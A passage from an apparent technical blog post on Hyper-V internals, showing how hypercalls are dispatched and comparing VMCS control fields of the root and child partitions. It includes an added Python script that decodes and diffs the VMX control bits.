<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 71.4pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; clear: left; color: black; float: left; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; margin-bottom: 1em; margin-right: 1em; text-decoration: none; vertical-align: baseline;"><img height="258" src="https://lh3.googleusercontent.com/LdLAKiaxTdtTC6xpdTUnCC0RB2OyT0FabWxMbS1_l0AijNtYvOP2BX6rOCjIfjv1gwr9C2qFbL4omSVBbk9NKmc_gDCihqw-3L_PWDKa4HT_I8gQE1giGfs81DmRMDdIGn6DfUCX6dQl_Ioc" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="565" /></span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 70.9pt; margin-top: 0pt; text-align: justify; text-indent: -14.2pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">- </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">then there is a check which way the hypervisor have been transferred parameters through memory or through the registers (in this case, the fast call bit in EAX before hypercall should equal 1).</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 70.9pt; margin-top: 0pt; text-align: justify; text-indent: -14.2pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">- </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">then call the corresponding function.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">For comparison, some of the important fields VMCS were obtained using the script display_vmcs.py after VM exit:</span></div>
<div dir="ltr" style="margin-left: -5.75pt;">
<table style="border-collapse: collapse; border-image: none; border: currentColor;"><colgroup><col width="335"></col><col width="335"></col></colgroup><tbody>
<tr style="height: 0px;"><td style="border: 1px solid rgb(0, 0, 0); padding: 0px 8px; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Root partition</span></div>
</td><td style="border: 1px solid rgb(0, 0, 0); padding: 0px 8px; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Child partition</span></div>
</td></tr>
<tr style="height: 0px;"><td style="border: 1px solid rgb(0, 0, 0); padding: 0px 8px; vertical-align: top;"><br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">CPU_BASED_VM_EXEC_CONTROL = 0xb6206dfa</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Use TSC offsetting</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HLT exiting</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">MWAIT exiting</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">RDPMC exiting</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Use TPR shadow</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Use I/O bitmaps</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Use MSR bitmaps</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">MONITOR exiting</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Activate secondary controls</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">IO_BITMAP_A = 0x4e06000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">IO_BITMAP_A_HIGH = 0x0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">IO_BITMAP_B = 0x4e07000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">IO_BITMAP_B_HIGH = 0x0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">EXCEPTION_BITMAP = 0x40000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">MSR_BITMAP = 0x4e08000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">MSR_BITMAP_HIGH = 0x0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PIN_BASED_VM_EXEC_CONTROL = 0x1f</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">External-interrupt exiting</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">NMI exiting</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">SECONDARY_VM_EXEC_CONTROL = 0x2a</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Enable EPT</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Enable RDTSCP</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Enable VPID</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VM_ENTRY_CONTROLS = 0x13ff</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Load debug controls</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">IA-32e mode guest</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VM_EXIT_CONTROLS = 0x3efff</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Save debug controls</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Host address space size</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Acknowledge interrupt on exit</span></div>
</td><td style="border: 1px solid rgb(0, 0, 0); padding: 0px 8px; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">CPU_BASED_VM_EXEC_CONTROL = 0xb5a06dfa</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Use TSC offsetting</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HLT exiting</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">MWAIT exiting</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">RDPMC exiting</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Use TPR shadow</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">MOV-DR exiting</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Unconditional I/O exiting</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Use MSR bitmaps</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">MONITOR exiting</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Activate secondary controls</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">CR0_GUEST_HOST_MASK = 0xffffffe1</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">CR0_READ_SHADOW = 0x8001003b</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">CR4_GUEST_HOST_MASK = 0xfffff874</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">CR4_READ_SHADOW = 0x406f8</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">EXCEPTION_BITMAP = 0x40000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">GUEST_CR0 = 0x8001003b</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">GUEST_CR3 = 0x185000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">GUEST_CR4 = 0x426f9</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">GUEST_RIP = 0x839b1000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">GUEST_RSP = 0x8870f8a4</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HOST_CR0 = 0x80010031</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PIN_BASED_VM_EXEC_CONTROL = 0x1f</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">External-interrupt exiting</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">NMI exiting</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">SECONDARY_VM_EXEC_CONTROL = 0x62</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Enable EPT</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Enable VPID</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WBINVD exiting</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VM_ENTRY_CONTROLS = 0x11ff</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Load debug controls</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VM_EXIT_CONTROLS = 0x3efff</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Save debug controls</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Host address space size</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Acknowledge interrupt on exit</span></div>
</td></tr>
</tbody></table>
</div>
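<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Reading the raw control values in the table by hand is error-prone because most of the set bits are reserved default-1 padding rather than intercepts. The following Python decoder is an added example, not code from the original post: it names each set bit of the pin-based, primary and secondary processor-based, VM-entry and VM-exit controls according to the Intel SDM Vol. 3C bit layouts, separates the SDM's default-1 reserved bits from real controls, flags any set bit it cannot explain, and diffs the two columns of the table (root partition on the left, guest on the right). The DEFAULT1 masks are the classic SDM values; on processors whose TRUE capability MSRs allow some of those bits to be cleared the padding will simply be absent.</span></div>

```python
"""Decode VMX control fields the way the VMCS table above lists them.

Added example (not code from the original post). Bit positions and names
follow the Intel SDM Vol. 3C tables for the pin-based, primary and secondary
processor-based, VM-entry and VM-exit controls. The *_DEFAULT1 masks are the
bits the SDM defines as reserved default-1 (set unless the TRUE capability
MSRs allow clearing them), so padding is not mistaken for an intercept.
Sample values are the ones printed in the table.
"""

PIN_BASED = {0: "External-interrupt exiting", 3: "NMI exiting", 5: "Virtual NMIs",
             6: "Activate VMX-preemption timer", 7: "Process posted interrupts"}
PIN_BASED_DEFAULT1 = 0x16                       # bits 1, 2, 4

CPU_BASED = {2: "Interrupt-window exiting", 3: "Use TSC offsetting",
             7: "HLT exiting", 9: "INVLPG exiting", 10: "MWAIT exiting",
             11: "RDPMC exiting", 12: "RDTSC exiting", 15: "CR3-load exiting",
             16: "CR3-store exiting", 17: "Activate tertiary controls",
             19: "CR8-load exiting", 20: "CR8-store exiting",
             21: "Use TPR shadow", 22: "NMI-window exiting",
             23: "MOV-DR exiting", 24: "Unconditional I/O exiting",
             25: "Use I/O bitmaps", 27: "Monitor trap flag",
             28: "Use MSR bitmaps", 29: "MONITOR exiting",
             30: "PAUSE exiting", 31: "Activate secondary controls"}
CPU_BASED_DEFAULT1 = 0x0401E172                 # bits 1, 4-6, 8, 13-16, 26

SECONDARY = {0: "Virtualize APIC accesses", 1: "Enable EPT",
             2: "Descriptor-table exiting", 3: "Enable RDTSCP",
             4: "Virtualize x2APIC mode", 5: "Enable VPID", 6: "WBINVD exiting",
             7: "Unrestricted guest", 8: "APIC-register virtualization",
             9: "Virtual-interrupt delivery", 10: "PAUSE-loop exiting",
             11: "RDRAND exiting", 12: "Enable INVPCID", 13: "Enable VM functions",
             14: "VMCS shadowing", 15: "Enable ENCLS exiting", 16: "RDSEED exiting",
             17: "Enable PML", 18: "EPT-violation #VE", 19: "Conceal VMX from PT",
             20: "Enable XSAVES/XRSTORS", 22: "Mode-based execute control for EPT",
             25: "Use TSC scaling"}

VM_ENTRY = {2: "Load debug controls", 9: "IA-32e mode guest", 10: "Entry to SMM",
            11: "Deactivate dual-monitor treatment", 13: "Load IA32_PERF_GLOBAL_CTRL",
            14: "Load IA32_PAT", 15: "Load IA32_EFER", 16: "Load IA32_BNDCFGS",
            17: "Conceal VMX from PT", 18: "Load IA32_RTIT_CTL"}
VM_ENTRY_DEFAULT1 = 0x000011FF                  # bits 0-8, 12

VM_EXIT = {2: "Save debug controls", 9: "Host address-space size",
           12: "Load IA32_PERF_GLOBAL_CTRL", 15: "Acknowledge interrupt on exit",
           18: "Save IA32_PAT", 19: "Load IA32_PAT", 20: "Save IA32_EFER",
           21: "Load IA32_EFER", 22: "Save VMX-preemption timer value",
           23: "Clear IA32_BNDCFGS", 24: "Conceal VMX from PT",
           25: "Clear IA32_RTIT_CTL"}
VM_EXIT_DEFAULT1 = 0x00036DFF                   # bits 0-8, 10, 11, 13, 14, 16, 17


def decode(value, names, default1=0):
    """Split a 32-bit control field into (named controls set, unexplained bits).

    A set bit that has no name and is not default-1 padding lands in the
    second list: either the name table is older than the CPU, or the value
    is not a control field at all. Both are worth noticing in a dump.
    """
    named, unexplained = [], []
    for bit in range(32):
        if not (value >> bit) & 1:
            continue
        if bit in names:
            named.append(names[bit])
        elif not (default1 >> bit) & 1:
            unexplained.append(bit)
    return named, unexplained


def diff_controls(a, b, names, default1=0):
    """Named controls set only in field value a, and only in b."""
    only_a = set(decode(a, names, default1)[0])
    only_b = set(decode(b, names, default1)[0])
    return sorted(only_a - only_b), sorted(only_b - only_a)


if __name__ == "__main__":
    # Values from the table: left column is the root partition, right the guest.
    table = {
        "PIN_BASED_VM_EXEC_CONTROL": (0x1F, 0x1F, PIN_BASED, PIN_BASED_DEFAULT1),
        "SECONDARY_VM_EXEC_CONTROL": (0x2A, 0x62, SECONDARY, 0),
        "VM_ENTRY_CONTROLS": (0x13FF, 0x11FF, VM_ENTRY, VM_ENTRY_DEFAULT1),
        "VM_EXIT_CONTROLS": (0x3EFFF, 0x3EFFF, VM_EXIT, VM_EXIT_DEFAULT1),
    }
    for field, (root, guest, names, d1) in table.items():
        root_only, guest_only = diff_controls(root, guest, names, d1)
        print(f"{field}: root-only={root_only} guest-only={guest_only}")
    named, rest = decode(0xB5A06DFA, CPU_BASED, CPU_BASED_DEFAULT1)
    print("guest CPU_BASED_VM_EXEC_CONTROL:", ", ".join(named), "unexplained:", rest)
```

<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Run against the table, the decoder reproduces the names listed there and shows the differences that matter: the root partition has Enable RDTSCP and a 64-bit (IA-32e) guest state, the guest partition instead gets WBINVD exiting and, in its primary controls, Unconditional I/O exiting rather than Use I/O bitmaps.</span></div>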
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
